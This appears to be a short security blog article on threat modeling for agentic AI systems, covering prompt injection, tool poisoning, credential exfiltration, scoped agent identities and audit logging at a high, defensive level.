← Back to Cyber

Agentic Threat Modeling: Securing the AI Attack Surface

— by Terel Lewis

Agentic AI systems introduce a fundamentally new class of security risk. Unlike traditional software that executes deterministic code paths, AI agents operate with autonomy — they browse the web, call external APIs, write and execute code, and chain tool calls together to accomplish goals. Each of those capabilities is a potential attack surface.

The Expanding Attack Surface

A conventional threat model focuses on network perimeters and application layers. An agentic threat model must also account for prompt injection, where malicious content embedded in a tool response or retrieved document hijacks the agent's instructions. It must account for tool poisoning, where a compromised MCP server or API returns payloads designed to alter agent behavior. And it must account for credential exfiltration, where an agent with access to secrets can be manipulated into leaking them.

The MITRE ATT&CK framework is beginning to incorporate agentic attack patterns, but practitioners should not wait for a formal taxonomy. Security teams should map their own agent workflows today using a lightweight threat model: identify every tool an agent can invoke, every data source it can read, and every credential it can access — then ask what happens if any one of those inputs is adversarially controlled.

Identity Is the Control Plane

Because agents act on behalf of human users or services, identity is the most critical control point. Each agent should be issued its own non-human identity with scoped permissions and ephemeral credentials. Treat agent identities the same way you would treat privileged service accounts: rotate credentials frequently, audit every action, and apply least-privilege by default. Any agent that can read a secret should be assumed capable of exfiltrating it if compromised.

Common vulnerability identifiers like CVE-2024-XXXXX are increasingly relevant to the libraries and runtimes that underpin agent frameworks. Keeping a software bill of materials (SBOM) — and the emerging AI bill of materials (AI BOM) — for every model, library, and tool integration is no longer optional for teams operating agents in production.

Monitoring and Response

Agents generate rich audit trails — every tool call, every retrieved document, every model inference can be logged. Security teams should treat these logs with the same rigor applied to infrastructure logs: ingest them into a SIEM, alert on anomalous tool-call sequences, and maintain enough context to reconstruct the chain of agent actions that led to any incident.

The organizations that will be best positioned in the agentic era are those that start building these controls now, before an incident forces the conversation.